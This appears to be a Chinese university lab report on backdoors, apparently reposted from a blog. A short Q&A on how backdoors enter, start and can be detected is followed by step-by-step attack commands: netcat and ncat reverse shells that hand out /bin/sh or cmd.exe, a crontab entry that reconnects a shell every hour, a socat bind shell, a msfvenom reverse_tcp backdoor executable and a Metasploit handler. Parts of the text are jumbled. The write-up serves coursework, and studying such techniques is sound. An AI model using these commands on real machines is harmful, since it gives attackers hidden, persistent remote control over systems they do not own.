留在计算机系统当中的、共某些特殊使用者通过特殊方式控制计算机系统的途径
可以绕过系统已有的安全设置,还能够挫败各种增强的安全措施
- Q:列举一个你能想到的后门进入系统的可能方式
1.通过非官方途径下载安装的应用程序中绑定的可执行文件留下后门;
2.访问的网页被植入木马程序,访问之后自动安装木马程序。
- Q:列举你知道的后门的启动(win及linux)方式
1.Windows:可以通过修改注册表项、有道游湖执行带有后门的可执行文件或设置为开机自启项等;
2.Linux:可以对正常的软件注入shellcode。
- Q:Meterpreter有哪些给你印象深刻的功能
1.可以通过植入后门在被侵入用户不知情的情况下获取被控及的shell、执行指令;还可以调用并获取被控制主机的话筒、摄像头、键盘等硬件。
- Q:如何检测自己的系统当中是否被安装后门
1.检查系统中是否有异常开放的端口;
2.通过杀毒软件等对电脑进行监控并定期对系统进行检测;
3.检查开机自启项、注册表当中是否有可以内容。
netcat的一些操作
Windows下查看本机的IP,使用nc.exe -l -p 5115
指令监听5115端口
在kali中反弹连接Windows,使用指令nc 192.168.1.299 5115 -e /bin/sh
,其中,-e
选项用于之情shell程序
查看kali的IP地址,在kali中监听5115端口nc -l -p 5115
在Windows中反弹连接kali,ncat.exe -e cmd.exe 192.168.1.133 5115
kali成功获得Windows的cmd
使用指令nc.exe -l -p 5115 > file1.out
在Windows下监听5115端口,并将数据保存到文件 file1.out中。
使用指令nc 192.168.1.299 5115 < file1.in
在kali当中连接到Windows的5115端口
成功建立连接,在kali中修改文件,Windows当中可以直接接收到。
crontab -e
指令添加一条定时任务,编辑器我选择的是3vim编辑器;25 * * * * /bin/netcat 192.168.1.73 5115 -e /bin/sh
tcp-listen:5315exec:cmd.exe,pty,stderr
命令,该命令的作用是将cmd.exe绑定到5115端口上,同时将cmd的stderr重定向到stdout上;socat - tcp:192.168.1.191:5115
指令,就可以获得Windows的cmd shell。msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=5115 -f exe > 20165115_backdoor.exe
其中的IP地址为kali的IP地址。可以看到在kali当中已经生成了我们需要的后门程序20165115_backdoor.exe;nc.exe -l -p 5115 > 20165115_backdoor.exe
,将被控主机转入接受文件模式;nc 192.168.1.191 5115 < 20165318_backdoor.exe
,即可成功将文件传输至被控主机当中msfconsole
指令进入msf控制台进行后续的操作;use exploit/multi/handler
调用监听模块;set payload windows/meterpreter/reverse_tcp
设置使用和生成后门程序时使用相同的payloadset LHOST 192.168.1.133
与set LPORT 5115
,设置成生成后门程序时的IP地址与端口号导致这个问题出现的原因是Windows的一个小bug,即虽然任务计划当中我们设定的计划在运行,但实际上还需要手动启动一次才真正的开始运行。
# 2018-2019-2 网络对抗技术 20165115 Exp2 后门原理与实践 #
原文:https://www.cnblogs.com/zcy20165115/p/10587128.html